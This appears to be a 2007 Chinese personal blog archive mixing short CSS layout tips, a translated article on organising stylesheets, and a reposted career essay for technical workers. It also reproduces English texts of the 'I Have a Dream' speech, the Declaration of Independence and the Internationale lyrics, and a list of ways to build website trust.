  许多网页上都有导航菜单,当进入某页时,菜单上相应这一项就应该变灰,而其他页亮起来。一般要实现这个效果,需要写程序或专门为每一页做设计,现在靠CSS就可以实现这个效果。
  首先,在导航代码中使用CSS类:
<ul>
>li><a href="#" class="home">Home</a></li>
<li><a href="#" class="about">About us</a></li>
<li><a href="#" class="contact">Contact us</a></li>
</ul>
  然后分别为每一页的Body指定一个id,和上面类同名。如<body id="contact">。
  然后设计CSS如下:
  #home .home, #about .about, #about .about
  {
  commands for highlighted navigation go here
}
  这里,当id设为home时,.home就会起作用,也就是class设为home的那一行导航条就会显示出特殊效果来。其他页也是如此。

图片灰圈白框效果

真的是非常简单,但是这个创意可不算简单,效果也挺漂亮的

HTML:
<div class="pic">
CSS定义:
.pic{padding:4px;border:1px solid #ADB4B8;background:#FFF}

2007年5月14日星期一

[转载]谈谈技术人员的最终出路

  做为技术人员,大家都觉得工资高,工作稳定,还能学到很多的东西。是大部份走出校门或性格内向,或希望过平静生活的人的必然选择。其实,你们有没有问过自己,这条路到底走对了吗?
  一个刚毕业的大学生,从事销售和从事技术两种不同的工作,可能工资的差距会达到数倍之远。对于初出校门的人来说,不无一种极端的诱惑力。刚毕业的年青人,当然会果断的选择技术之路。
  两年后,我们再看看,由于经验的积累,做业务的积累了部份客户资源,做技术的积累了好的经验,在各自的领域内都大展开了手脚,收入也基本接近了。
  再以后呢,技术之路越来越难走,毕竟做技术需要的大量的时间和精力,否则就跟不上现在时代的技术更新了,做业务的呢,客户群越来越大,经验越来越丰富,谁的收入会更高?
  两种不同的职业,它们有着各自不同的特点,技术行业是个撑不死,饱不了的地方,而销售行业则是没有尽头的发展之路。
  过了三十岁,大家会选择什么呢,结婚、生子,人生的一条老路,做技术的大多都成为了技术部门的负责人,职位不错;做销售的呢?可能还是个业务员,毕竟做大量的业务都集中在少数人手里。古往今来,财富的集中是如此的相似!但是观察两个职业成功人士的比较,是不是相差太远了?
  学到死,做到死、发不了财的技术,有什么值得人留恋的!
  到了三十岁,你还有自信面对繁重的工作吗?你有刚出社会的人的活力吗?你能和他们比工作时间,玩命地在老板面前表现吗?你能丢下妻儿出差一、两个月吗?能被小你十来岁的小孩命令来命令去吗?
  我不能。。。。。。
  有人会说,我有了技术!
  技术经验是什么?一些老的,过去了的东西,他代表着你所留恋的过去,你所放不下的那一部份,你会以经验来判别事物,选择工作方法。在新老技术交替的时间内,经验可以起到承前启后的作用,让你威风八面。可是,你还会用到多少两年以前的经验呢?
  大家所掌握的技术终会过时,脑子僵化的时候总会到来。那时,你何去何从?
  如果你的目标只是买个狗窝,摆个小烟摊,请不要再往下看了。“知足者常乐”也是一种人生的境界,我羡慕那些五台山上的和尚,我做不到!
  到处是高级住宅,我为什么只住10平的小屋?满大街跑的小车,我为什么要天天挤公交?我要为三十岁后不再挤公交车而奋斗!

  转型------技术人的必须选择!
  转型做什么呢?
  技术的优势在于什么?前些年是不是白干了?
  如何转型?
  让我们分析一下职业,什么样的工作能让我们越老越是宝。
  干部!
  不用说就是第一名,看看中央领导人就知道了嘛。
  财务
  每个老总都喜欢用年龄大点的,稳重嘛!大部份公司还要请个老头子之类的做财务总监。只拿工资不打卡。无它,做假帐的高手。我家老头子每到年底可是按天拿钱。
  教师
  好工作啊,老教授嘛,不老怎么成得了教授。娶老婆的重点发展目标。嫁嘛?就算了。
  上面所说的几个职业,技术人是很难有机会了,毕竟大多数人没有办法再转这么大个弯。
  我们的出路,只有两个方面:销售和技术型管理!
  先说说做销售。
  大家是不是有这种感觉,做销售的人天天都在说现在的客户难打交道。而你是不是感觉客户其实人很好,很容易成为朋友。这就是你的优势!
  你先前的技术基础,己经让他们很容易的接受你了。而你和他们有着很多的话题,能真正的为他们解决很多实际的问题。经常站在他们的角度为他们着想,你说出来的话能令他们信服。这样的业务人员,哪个客户不爱呢?
  做销售,最难的怎么和客户取得第一次的联系,你己经可以依靠技术突破这一点了,你还怕什么。只要心不太黑,客户永远都是你的朋友。   只要多学学心理学,好好锻炼一下自己的口材、勤减一下肥。碰几次壁、吃几次亏后你哪点不像是业务高手。
  再说技术型管理。
  你己经有了技术,有了那么多经验。只要把它们全部拿出来,做事、培训新人。你会发现别人看你的眼睛都是仰视的。其实,你不过是剥夺了他们实际动手的机会,也许还会让他们顺着你的思路,成为你延长了的手。成为你表现能力的更大的舞台。那时,一切的功劳都是你的,老板怎么会不重视你,你的职位又怎会不上升了?
  不过,这只是下乘之道。
  上乘之道在于攻心。。。。。。
  首先在于攻自己的心。
  第一步,树立起自己的目标,多少时间内,工资上涨多少、职位到什么。不管你的直属上司是老板还是谁。如果己经觉得到头了,就离开吧。寻找新的目标。不要犹豫。
  第二步,拿出自己的所有能力,展现给其它人看,尽心尽力做好每一件事情。也许,伯乐的眼睛正在这时候盯着你。
  第三步,提升自己技术和管理能力,我所指的技术能力不是要你再不停的追求最新的技术,你没有那么多时间了。应该反过头来,寻求技术的本源,掌握了他,技术再怎么发展,你只需要花一点点时间就能掌握最新的。
  对于管理能力,只要不损害老板的利益,该管的尽量去管,不该管的尽量提意见,无论对错,无论成败,对你来说,都是经验的积累。
  第四步,敢于担起责任,不管事情的结果是否会失败。一个有勇气承担失败责任的人,更会让人尊敬。而且,失败了你又会损失多少了,最大不过是走人罢了。
  其次攻他人的心
  无论是对上还是对下,都应该是有勇有谋,利用技术的理性分析能力,把握住事物的关键,“知己知彼”的结果,绝大部份都是“百战不殆”。
  对下,应该尽量地去关心他们,因难自己背;好事让点出来,名声让出来一点,反正你的名声也不少了,他们做得好,别人也会说你带得好;他们做错了,你再出马搞定,就不是一点点名声了。
  对于属下和同事,也不要保留技术,我们不是靠手艺吃饭,不是收藏古董,为什么非要等到变成垃圾了才拿出来丢人现眼呢。尽力去做吧!让大家都成为你的徒弟。你的人气自然就来了。
  总之,还有很多很多。。。。。。
  我想,最辉煌的时间总会过去的,在这个充满了金钱的社会,谁不是天平上的的砝码。同样大小的黄金,总要重过铁吧!
  在这里,我一直在想着,想着以后我应该走的路,同时也祝各位住自己的房子,开自己的车子,花自己的票子,摆自己的面子。

2007年5月11日星期五

论坛常用的页数做法

先是一个<div class="p_bar">
CSS定义:
.p_bar {margin: 1px 0px;clear: both;}
.p_bar a {float: left;padding: 1px 4px;font-size: 12px;text-decoration: none;}

然后在这个DIV里
<a href="forum-11-2.html" class="p_num">1</a>一个个列下去

CSS定义:
.p_num {background-color: #FFFFFF;border: 1px solid #DEDEB8;margin-right:1px;vertical-align: middle;}
a:hover.p_num {background-color: #F5FBFF;border: 1px solid #86B9D6;text-decoration: none;}

2007年5月9日星期三

I Have A Dream

In 1950's America, the equality of man envisioned by the Declaration of Independence was far from a reality. People of color — blacks, Hispanics, Orientals — were discriminated against in many ways, both overt and covert. The 1950's were a turbulent time in America, when racial barriers began to come down due to Supreme Court decisions, like Brown v. Board of Education; and due to an increase in the activism of blacks, fighting for equal rights.

Martin Luther King, Jr., a Baptist minister, was a driving force in the push for racial equality in the 1950's and the 1960's. In 1963, King and his staff focused on Birmingham, Alabama. They marched and protested non-violently, raising the ire of local officials who sicced water cannon and police dogs on the marchers, whose ranks included teenagers and children. The bad publicity and break-down of business forced the white leaders of Birmingham to concede to some anti-segregation demands.

Thrust into the national spotlight in Birmingham, where he was arrested and jailed, King organized a massive march on Washington, DC, on August 28, 1963. On the steps of the Lincoln Memorial, he evoked the name of Lincoln in his "I Have a Dream" speech, which is credited with mobilizing supporters of desegregation and prompted the 1964 Civil Rights Act. The next year, King was awarded the Nobel Peace Prize.
The following is the exact text of the spoken speech, transcribed from recordings.
-------------------------------------------------
I am happy to join with you today in what will go down in history as the greatest demonstration for freedom in the history of our nation.
Five score years ago, a great American, in whose symbolic shadow we stand today, signed the Emancipation Proclamation. This momentous decree came as a great beacon light of hope to millions of Negro slaves who had been seared in the flames of withering injustice. It came as a joyous daybreak to end the long night of their captivity.

But one hundred years later, the Negro still is not free. One hundred years later, the life of the Negro is still sadly crippled by the manacles of segregation and the chains of discrimination. One hundred years later, the Negro lives on a lonely island of poverty in the midst of a vast ocean of material prosperity. One hundred years later, the Negro is still languishing in the corners of American society and finds himself an exile in his own land. So we have come here today to dramatize a shameful condition.

In a sense we have come to our nation's capital to cash a check. When the architects of our republic wrote the magnificent words of the Constitution and the Declaration of Independence, they were signing a promissory note to which every American was to fall heir. This note was a promise that all men, yes, black men as well as white men, would be guaranteed the unalienable rights of life, liberty, and the pursuit of happiness.

It is obvious today that America has defaulted on this promissory note insofar as her citizens of color are concerned. Instead of honoring this sacred obligation, America has given the Negro people a bad check, a check which has come back marked "insufficient funds." But we refuse to believe that the bank of justice is bankrupt. We refuse to believe that there are insufficient funds in the great vaults of opportunity of this nation. So we have come to cash this check — a check that will give us upon demand the riches of freedom and the security of justice. We have also come to this hallowed spot to remind America of the fierce urgency of now. This is no time to engage in the luxury of cooling off or to take the tranquilizing drug of gradualism. Now is the time to make real the promises of democracy. Now is the time to rise from the dark and desolate valley of segregation to the sunlit path of racial justice. Now is the time to lift our nation from the quick sands of racial injustice to the solid rock of brotherhood. Now is the time to make justice a reality for all of God's children.

It would be fatal for the nation to overlook the urgency of the moment. This sweltering summer of the Negro's legitimate discontent will not pass until there is an invigorating autumn of freedom and equality. Nineteen sixty-three is not an end, but a beginning. Those who hope that the Negro needed to blow off steam and will now be content will have a rude awakening if the nation returns to business as usual. There will be neither rest nor tranquility in America until the Negro is granted his citizenship rights. The whirlwinds of revolt will continue to shake the foundations of our nation until the bright day of justice emerges.

But there is something that I must say to my people who stand on the warm threshold which leads into the palace of justice. In the process of gaining our rightful place we must not be guilty of wrongful deeds. Let us not seek to satisfy our thirst for freedom by drinking from the cup of bitterness and hatred.

We must forever conduct our struggle on the high plane of dignity and discipline. We must not allow our creative protest to degenerate into physical violence. Again and again we must rise to the majestic heights of meeting physical force with soul force. The marvelous new militancy which has engulfed the Negro community must not lead us to distrust of all white people, for many of our white brothers, as evidenced by their presence here today, have come to realize that their destiny is tied up with our destiny and their freedom is inextricably bound to our freedom. We cannot walk alone.

As we walk, we must make the pledge that we shall march ahead. We cannot turn back. There are those who are asking the devotees of civil rights, "When will you be satisfied?" We can never be satisfied as long as the Negro is the victim of the unspeakable horrors of police brutality. We can never be satisfied, as long as our bodies, heavy with the fatigue of travel, cannot gain lodging in the motels of the highways and the hotels of the cities. We can never be satisfied as long as a Negro in Mississippi cannot vote and a Negro in New York believes he has nothing for which to vote. No, no, we are not satisfied, and we will not be satisfied until justice rolls down like waters and righteousness like a mighty stream.

I am not unmindful that some of you have come here out of great trials and tribulations. Some of you have come fresh from narrow jail cells. Some of you have come from areas where your quest for freedom left you battered by the storms of persecution and staggered by the winds of police brutality. You have been the veterans of creative suffering.

Continue to work with the faith that unearned suffering is redemptive.
Go back to Mississippi, go back to Alabama, go back to South Carolina, go back to Georgia, go back to Louisiana, go back to the slums and ghettos of our northern cities, knowing that somehow this situation can and will be changed. Let us not wallow in the valley of despair.

I say to you today, my friends, so even though we face the difficulties of today and tomorrow, I still have a dream. It is a dream deeply rooted in the American dream.

I have a dream that one day this nation will rise up and live out the true meaning of its creed: "We hold these truths to be self-evident: that all men are created equal."

I have a dream that one day on the red hills of Georgia the sons of former slaves and the sons of former slave owners will be able to sit down together at the table of brotherhood.

I have a dream that one day even the state of Mississippi, a state sweltering with the heat of injustice, sweltering with the heat of oppression, will be transformed into an oasis of freedom and justice.

I have a dream that my four little children will one day live in a nation where they will not be judged by the color of their skin but by the content of their character.

I have a dream today.

I have a dream that one day, down in Alabama, with its vicious racists, with its governor having his lips dripping with the words of interposition and nullification; one day right there in Alabama, little black boys and black girls will be able to join hands with little white boys and white girls as sisters and brothers.

I have a dream today.

I have a dream that one day every valley shall be exalted, every hill and mountain shall be made low, the rough places will be made plain, and the crooked places will be made straight, and the glory of the Lord shall be revealed, and all flesh shall see it together.

This is our hope. This is the faith that I go back to the South with. With this faith we will be able to hew out of the mountain of despair a stone of hope. With this faith we will be able to transform the jangling discords of our nation into a beautiful symphony of brotherhood. With this faith we will be able to work together, to pray together, to struggle together, to go to jail together, to stand up for freedom together, knowing that we will be free one day.

This will be the day when all of God's children will be able to sing with a new meaning, "My country, 'tis of thee, sweet land of liberty, of thee I sing. Land where my fathers died, land of the pilgrim's pride, from every mountainside, let freedom ring."

And if America is to be a great nation this must become true. So let freedom ring from the prodigious hilltops of New Hampshire. Let freedom ring from the mighty mountains of New York. Let freedom ring from the heightening Alleghenies of Pennsylvania!

Let freedom ring from the snowcapped Rockies of Colorado!

Let freedom ring from the curvaceous slopes of California!

But not only that; let freedom ring from Stone Mountain of Georgia!

Let freedom ring from Lookout Mountain of Tennessee!

Let freedom ring from every hill and molehill of Mississippi. From every mountainside, let freedom ring.

And when this happens, When we allow freedom to ring, when we let it ring from every village and every hamlet, from every state and every city, we will be able to speed up that day when all of God's children, black men and white men, Jews and Gentiles, Protestants and Catholics, will be able to join hands and sing in the words of the old Negro spiritual, "Free at last! free at last! thank God Almighty, we are free at last!"

The Declaration of Independence

IN CONGRESS, JULY 4, 1776
The unanimous Declaration of the thirteen united States of America

When in the Course of human events it becomes necessary for one people to dissolve the political bands which have connected them with another and to assume among the powers of the earth, the separate and equal station to which the Laws of Nature and of Nature's God entitle them, a decent respect to the opinions of mankind requires that they should declare the causes which impel them to the separation.

We hold these truths to be self-evident, that all men are created equal, that they are endowed by their Creator with certain unalienable Rights, that among these are Life, Liberty and the pursuit of Happiness. — That to secure these rights, Governments are instituted among Men, deriving their just powers from the consent of the governed, — That whenever any Form of Government becomes destructive of these ends, it is the Right of the People to alter or to abolish it, and to institute new Government, laying its foundation on such principles and organizing its powers in such form, as to them shall seem most likely to effect their Safety and Happiness. Prudence, indeed, will dictate that Governments long established should not be changed for light and transient causes; and accordingly all experience hath shewn that mankind are more disposed to suffer, while evils are sufferable than to right themselves by abolishing the forms to which they are accustomed. But when a long train of abuses and usurpations, pursuing invariably the same Object evinces a design to reduce them under absolute Despotism, it is their right, it is their duty, to throw off such Government, and to provide new Guards for their future security. — Such has been the patient sufferance of these Colonies; and such is now the necessity which constrains them to alter their former Systems of Government. The history of the present King of Great Britain is a history of repeated injuries and usurpations, all having in direct object the establishment of an absolute Tyranny over these States. To prove this, let Facts be submitted to a candid world.

He has refused his Assent to Laws, the most wholesome and necessary for the public good.

He has forbidden his Governors to pass Laws of immediate and pressing importance, unless suspended in their operation till his Assent should be obtained; and when so suspended, he has utterly neglected to attend to them.

He has refused to pass other Laws for the accommodation of large districts of people, unless those people would relinquish the right of Representation in the Legislature, a right inestimable to them and formidable to tyrants only.

He has called together legislative bodies at places unusual, uncomfortable, and distant from the depository of their Public Records, for the sole purpose of fatiguing them into compliance with his measures.

He has dissolved Representative Houses repeatedly, for opposing with manly firmness his invasions on the rights of the people.

He has refused for a long time, after such dissolutions, to cause others to be elected, whereby the Legislative Powers, incapable of Annihilation, have returned to the People at large for their exercise; the State remaining in the mean time exposed to all the dangers of invasion from without, and convulsions within.

He has endeavoured to prevent the population of these States; for that purpose obstructing the Laws for Naturalization of Foreigners; refusing to pass others to encourage their migrations hither, and raising the conditions of new Appropriations of Lands.

He has obstructed the Administration of Justice by refusing his Assent to Laws for establishing Judiciary Powers.

He has made Judges dependent on his Will alone for the tenure of their offices, and the amount and payment of their salaries.

He has erected a multitude of New Offices, and sent hither swarms of Officers to harass our people and eat out their substance.

He has kept among us, in times of peace, Standing Armies without the Consent of our legislatures.

He has affected to render the Military independent of and superior to the Civil Power.

He has combined with others to subject us to a jurisdiction foreign to our constitution, and unacknowledged by our laws; giving his Assent to their Acts of pretended Legislation:

For quartering large bodies of armed troops among us:

For protecting them, by a mock Trial from punishment for any Murders which they should commit on the Inhabitants of these States:

For cutting off our Trade with all parts of the world:

For imposing Taxes on us without our Consent:

For depriving us in many cases, of the benefit of Trial by Jury:

For transporting us beyond Seas to be tried for pretended offences:

For abolishing the free System of English Laws in a neighbouring Province, establishing therein an Arbitrary government, and enlarging its Boundaries so as to render it at once an example and fit instrument for introducing the same absolute rule into these Colonies

For taking away our Charters, abolishing our most valuable Laws and altering fundamentally the Forms of our Governments:

For suspending our own Legislatures, and declaring themselves invested with power to legislate for us in all cases whatsoever.

He has abdicated Government here, by declaring us out of his Protection and waging War against us.

He has plundered our seas, ravaged our coasts, burnt our towns, and destroyed the lives of our people.

He is at this time transporting large Armies of foreign Mercenaries to compleat the works of death, desolation, and tyranny, already begun with circumstances of Cruelty & Perfidy scarcely paralleled in the most barbarous ages, and totally unworthy the Head of a civilized nation.

He has constrained our fellow Citizens taken Captive on the high Seas to bear Arms against their Country, to become the executioners of their friends and Brethren, or to fall themselves by their Hands.

He has excited domestic insurrections amongst us, and has endeavoured to bring on the inhabitants of our frontiers, the merciless Indian Savages whose known rule of warfare, is an undistinguished destruction of all ages, sexes and conditions.

In every stage of these Oppressions We have Petitioned for Redress in the most humble terms: Our repeated Petitions have been answered only by repeated injury. A Prince, whose character is thus marked by every act which may define a Tyrant, is unfit to be the ruler of a free people.

Nor have We been wanting in attentions to our British brethren. We have warned them from time to time of attempts by their legislature to extend an unwarrantable jurisdiction over us. We have reminded them of the circumstances of our emigration and settlement here. We have appealed to their native justice and magnanimity, and we have conjured them by the ties of our common kindred. to disavow these usurpations, which would inevitably interrupt our connections and correspondence. They too have been deaf to the voice of justice and of consanguinity. We must, therefore, acquiesce in the necessity, which denounces our Separation, and hold them, as we hold the rest of mankind, Enemies in War, in Peace Friends.

We, therefore, the Representatives of the united States of America, in General Congress, Assembled, appealing to the Supreme Judge of the world for the rectitude of our intentions, do, in the Name, and by Authority of the good People of these Colonies, solemnly publish and declare, That these united Colonies are, and of Right ought to be Free and Independent States, that they are Absolved from all Allegiance to the British Crown, and that all political connection between them and the State of Great Britain, is and ought to be totally dissolved; and that as Free and Independent States, they have full Power to levy War, conclude Peace contract Alliances, establish Commerce, and to do all other Acts and Things which Independent States may of right do. — And for the support of this Declaration, with a firm reliance on the protection of Divine Providence, we mutually pledge to each other our Lives, our Fortunes and our sacred Honor.

John Hancock

New Hampshire:
Josiah Bartlett, William Whipple, Matthew Thornton

Massachusetts:
John Hancock, Samuel Adams, John Adams, Robert Treat Paine, Elbridge Gerry

Rhode Island:
Stephen Hopkins, William Ellery

Connecticut:Roger Sherman, Samuel Huntington, William Williams, Oliver Wolcott

New York:
William Floyd, Philip Livingston, Francis Lewis, Lewis Morris

New Jersey:Richard Stockton, John Witherspoon, Francis Hopkinson, John Hart, Abraham Clark

Pennsylvania:
Robert Morris, Benjamin Rush, Benjamin Franklin, John Morton, George Clymer, James Smith, George Taylor, James Wilson, George Ross

Delaware:
Caesar Rodney, George Read, Thomas McKean

Maryland:
Samuel Chase, William Paca, Thomas Stone, Charles Carroll of Carrollton

Virginia:
George Wythe, Richard Henry Lee, Thomas Jefferson, Benjamin Harrison, Thomas Nelson, Jr., Francis Lightfoot Lee, Carter Braxton

North Carolina:
William Hooper, Joseph Hewes, John Penn

South Carolina:
Edward Rutledge, Thomas Heyward, Jr., Thomas Lynch, Jr., Arthur Middleton

Georgia:
Button Gwinnett, Lyman Hall, George Walton

2007年5月8日星期二

《国际歌》英语歌词

The Internationale: Original English Version
Original words by Eugene Pottier.
Original music by Pierre Degeyter.

Arise ye starvelings [or workers] from your slumbers
Arise ye criminals of want
For reason in revolt now thunders
and at last ends the age of cant.
Now away with all your superstitions
Servile masses arise, arise!
We'll change forthwith [or henceforth] the old conditions
And spurn the dust to win the prize.

CHORUS

Then come comrades rally
And the last fight let us face
The Internationale
Unites the human race. (repeat).

We peasants, artisans and others,
Enrolled amongst the sons of toil
Let's claim the earth henceforth for brothers
Drive the indolent from the soil.
On our flesh for too long has fed the raven
We've too long been the vultures prey.
But now farewell to spirit craven
The dawn brings in a brighter day.

CHORUS

No saviour from on high delivers
No trust we have in prince or peer
Our own right hand the chains must shiver
Chains of hatred, greed and fear.
Ere the thieves will out with their booty
And to all give a happier lot.
Each at his forge must do his duty
And strike the iron while its hot.

CHORUS
__________________________________



A more modern Version : The Internationale
Words: Billy Bragg
Music: Pierre Degeyter

Stand up, all victims of oppression
For the tyrants fear your might
Don't cling so hard to your possessions
For you have nothing, if you have no rights
Let racist ignorance be ended
For respect makes the empires fall
Freedom is merely privilege extended
Unless enjoyed by one and all

Chorus:
So come brothers and sisters
For the struggle carries on
The Internationale
Unites the world in song
So comrades come rally
For this is the time and place
The international ideal
Unites the human race

Let no one build walls to divide us
Walls of hatred nor walls of stone
Come greet the dawn and stand beside us
We'll live together or we'll die alone
In our world poisoned by exploitation
Those who have taken, now they must give
And end the vanity of nations
We've but one Earth on which to live

And so begins the final drama
In the streets and in the fields
We stand unbowed before their armour
We defy their guns and shields
When we fight, provoked by their aggression
Let us be inspired by like and love
For though they offer us concessions
Change will not come from above

2007年4月23日星期一

[转载]30步建立网站信任度

  网站信任度有2方面的意义,一方面指浏览者对于站点的信任程度,另一方面指搜索引擎对于网站的信任值(TrustRank)。网站信任度对于企业站点更为重要。下面主要针对用户体验,分享一些我的看法,假设我是用户,我希望看到下面的内容。
信任度的建设体现在以下方面:
1. 关于我们页面:详细、真实的说明公司背景、历史、业务范围等等情况。
2. 网站备案:获得ICP的备案许可。
3. 服务流程:让客户充分了解整个过程,让服务更透明。
4. 报价列表:根据不同服务,分别给出相应报价范围。
5. 客户案例:客户更愿意接收第三方的评价。
6. 联系方式:详细、完整、多途径的联系方式,并提供所在地地图指示。
7. 网页数量:充实的网页数量,企业站点至少50页以上。
8. 原创内容:客户不喜欢到处流传的论调。
9. 版权信息:正确书写版权信息。声明本站内容受法律保护,拒绝转载等。
10. 隐私保护:声明对客户信息、网友信息给予隐私保护。
11. 无错别字:客户看见错别字,会想“网页都不校对,服务质量也悬。”
12. 合作伙伴:合作伙伴的链接及合作方站内报道。
13. 专业名词:适当的使用专业名词,但不要影响用户阅读,并给予简单易懂的解释。
14. 企业新闻:列举第三方给予的各类报道。
15. 链接检查:使整个网站没有无效链接。
16. 广告适当:不要放无关的广告。
17. 友情链接:只和客户、政府以及行业知名网站作链接。
18. 免费咨询:提供400或800免费电话咨询,至少要有在线咨询或留言本。
19. 访问速度:别让用户和搜索引擎感觉网站很慢。
20. 网页配色:建议使用公司LOGO中的颜色。
21. 营业证明:提供公司营业执照、行业执照、相关检查证书、法人照片等。
22. 公司博客:多人维护一个博客,类似Google黑板报。用户更信任博客上的内容。
23. 常见问题:以客户关心的问题为导向,制作1个页面,页面不要太多,别作成说明书。
24. 员工照片:公司活动集体照,体现公司活力。
25. 保持更新:时不时的来篇专业文章、媒体报道、公司趣事等等。
26. 风格一致:如果是集体公司,总公司、国外公司、地方公司网站排版要一致,域名格式统一。不同语言的网站区别不能太大。
27. 原创图片:别用网上到处都有的图像,特别是客服打电话的图片。有能力最好购买专业图库。
28. 域名续费:最好一次注册10年,不要每年续费。
29. 导航结构:别让用户因为不知道怎么继续,而按“返回键”。
30. 最后,转载的文章一定要注明出处及作者 ^-^

[转载]网站设计之合理架构css

  在当前浏览器普遍支持的前提下,CSS被我们赋予了前所未有的使命。然而依赖css越多,样式表文件就会变得越大越复杂。与此同时,文件维护和组织的考验也随之而来。
  (曾几何时)只要一个css文件就够了——所有规则(rule)汇聚一堂,增删改都很方便——可这种日子早已远去。(现在)建立新网站时,必须花点时间好好筹划怎么组织和架构css。

文件的组织

  构建css系统的第一步是大纲的拟定。(我认为)css组织规划的重要性堪比网站目录结构。(HTMLor注:用词夸张一点,让你加深记忆) 没有哪种方案放之四海而皆准,因此我们会讨论一些基本的组织方案,以及它们各自的利弊。

主css文件

  通常可以使用一个主css文件,来放置所有页面共享的规则。这个文件会包含默认的字体、链接、页眉和其他等样式。有了主css文件之后,我们开始探讨高级组织策略。

  方法一:基于原型
  最基本的策略是基于原型页面(archetype page)分离css文件。假如一个网站的首页、子页面和组合页设计不同,就可以采用基于原型的策略。(这种策略下)每个页面都会有专属的css文件。
  在原型数量不多的情况下,这个方法简单明了、行之有效。然而,当页面元素并不按部就班的位于各个原型页时,问题就出现了。如果子页面和组合页共享某些元素,而首页却没有,我们应该怎么做呢?
  把共享元素放入主css文件。这虽不是最纯正的解决办法,却适用于某些具体情况。可是如果网站庞大,(这样做的话)主css文件会迅速膨胀——这就违背了分离文件的初衷:避免导入不必要的大文件。
  在组合页和子页面的css文件里各放一份样式代码。(这么做)就意味着要维护冗余代码,很显然我们不想这样。
  创建一个新的文件,由这两种页面共享。这听起来不错。不过假如只有10行代码,我们创建这个文件仅仅是为了共享这10行代码?(htmlor 注:杀鸡用牛刀?) 这方法很纯粹,但如果网站庞大有很多对页面共享很少量元素时(htmlor注:比如30对页面分别共享10行代码),就显得很笨重了。
  创建一个单独的css文件,包含所有共享元素的样式。这方法可能比较简单,却要取决于网站的大小和共享元素的多少。有种情况会很烦:导入了一个很大的css文件,但页面只用到一小部分样式——还是那句话,这违背了分离文件的初衷。
  这就是我所说的重叠的两难(overlap dilemma)。零碎css规则的重叠不一而足,并没有一个完全清晰无误的方案来组织它们。

  方法二:基于页面元素/块
  如果网站使用服务器端include,这个方法会很不错。举例说明,如果使用页眉include,它会有自己相应的css文件。页脚或者其他部分的include可以如法炮制,只须导入自己的css文件。这个方法简单干净,不过可能会产生很多小css文件。
  举例来说,假如页脚的样式只需要20行css代码,单独创建一个文件就划不来了。而且这个方法会导致每个页面都包含一堆css文件——因为有多少include,就得有多少css文件。

  方法三:基于标记
  这个方案直观实际,与前一个类似。如果网站共有30个页面,其中10个含有form,那么可以创建一个css文件专门处理form的样式,只在这10个页面导入它。如果另外10个页面含有table,就创建一个文件专门处理table样式……诸如此类。

  另外的组织技巧
  除了用主观的方法组织文件,我们还要考虑如打印、手持设备和屏幕等多种媒体类型。这虽然已经很清楚地定义过,可依旧是建立文件结构时应该考虑的一个因素。一旦必须支持多种媒体类型,主css文件里的某些规则可能就得重新考虑。
  另外,品牌联合也可能是一个重要因素。(htmlor注:如google和nike联手推出的joga) 如果涉及品牌联合,你就得考虑哪些元素应该调整以适应另一品牌。比如分别使用不同的css文件等。
  还有一个常被忽略的技巧:使用嵌套的@import语句。只包含一连串@import语句,或者再加几句css规则,就能创建一个css文件。用这个方法完全可以创建网站的主css文件(用@import导入各部分的样式文件)。假如网站的每个页面都导入了4到5个不同的css文件,无疑你应该考虑使用这个技巧。

规则和选择器的组织

  谈完了文件组织,接着讨论一下怎么组织文件里的东西吧。很自然,我们希望在文件里畅通无阻的浏览,迅速找到要编辑的选择器(selector)或规则。

冗余 vs. 附属

  正如Dave Shea在其文章《冗余 vs. 附属》(Redundancy vs. Dependency)里所说的,你必须不断了解级联(casCADe)。你要决定是对选择器编组(意味着附属),还是把它们分离(意味着冗余)。编组可以保持代码简洁扼要,可是会建立附属关系,导致维护开销增加。如果不编组,就会增加文件大小,让相似的选择器保持一致变得困难。只有做好这种权衡、取舍,才能每次都作出正确的决定。

按相互关系/上下文编组

  既然文件组织可以是主观的,那么显然,按照规则和选择器与其他部分的相互关系来进行编组是最好的方法。举例说明,假设你用容器、页眉和页脚来完成布局,就应该把它们编成一组。
  这似乎很简单,其实不然。比如,把页眉中的导航加入CSS时,是将它跟父元素编组还是独立编组?这种情况下,要视乎规则的上下文。通常,页眉与页面布局相关,应该与其他布局元素一起编组。而导航是页眉的一块,应该和页眉的其他块编组,而不是页眉本身。

使用注释

  跟大多数代码类似,注释是组织良好与否的关键。应该根据css的控制范围,清楚的标注每节(section)。最好确保注释视觉突出,以便在内容滚动、一目十行时快速定位。
  Doug Bowman在其文章《css组织技巧之一:标记》(CSS Organization Tip #1: Flags)里把css注释玩得高明之极。他详细说明了在节名之前加上等号,以便使用文本编辑器的查找功能迅速跳到某节。

别忘了

  你应该细致认真的了解了特异性、级联和继承,并善用它们。它们之中的每一项都可以是你最可怕的敌人,也可以是你最友善的朋友。当建立庞大的网站时,是否理解这些细微精妙之处,决定了你所构建的是坚如磐石的系统,还是经不起风雨的豆腐渣工程。(HTMLor注:这句完全意译,比较爽)

属性的组织

  现在我们了解了文件的组织,也知道了文件内规则的组织,但还有一个重要的组织环节(没有提到),那就是属性(attribute)。虽然属性比前两个概念更简单,可是还有一些非常好的、能够保持规则整洁的方法很值得一提。

按字母排序

  提到属性,如果说需要遵循什么原则的话,那就是:按-字-母-排-序。其实这招对于属性浏览帮助不大,不过可以防止属性值覆盖这种偶然事件的发生。
  举个例子吧,已经数不清有多少次,我为某个选择器定义过了margin值,之后的某天无意间又加了一个(或前或后)。(这种情况下)后一个属性自然会起作用。假设不知道第二个属性存在,不管我怎么调整第一个属性值、刷新浏览器,也看不到页面变化。(htmlor注:这个问题我深有体会) 如果按照字母顺序排列,你就会发现margin被定义了两次(因为它们挨在一起),这个问题自然可以避免。

优先项

  当网站复杂、牵涉太多css文件时,会建立大量的附属关系。一旦需要定制某个元素特有的样式,!important选项似乎是最佳选择。没错,!important是能解一时之需,但最好搞清楚导致问题的根源,然后根据级联关系决定是否真的需要用它。
  如果你对上文提到的特异性、级联和继承很熟悉,大可不必抱着!important一颗树不放。(htmlor注:整片森林等着你~) 当然它还是会派上用场,不过使用之前要对具体情况了然于胸。千万不要因为不知问题的症结所在而把!important当作捷径或是补救方案。

小结

  当我们变得依赖css而使样式表日渐复杂时,就需要正确的计划来避免犯错,并使代码易于维护。既然完美无缺的方案并不存在,那么了解css的工作方式以及文件、选择器和属性的多种组织方案,无疑有助于我们写出优质的代码,经受住时间考验。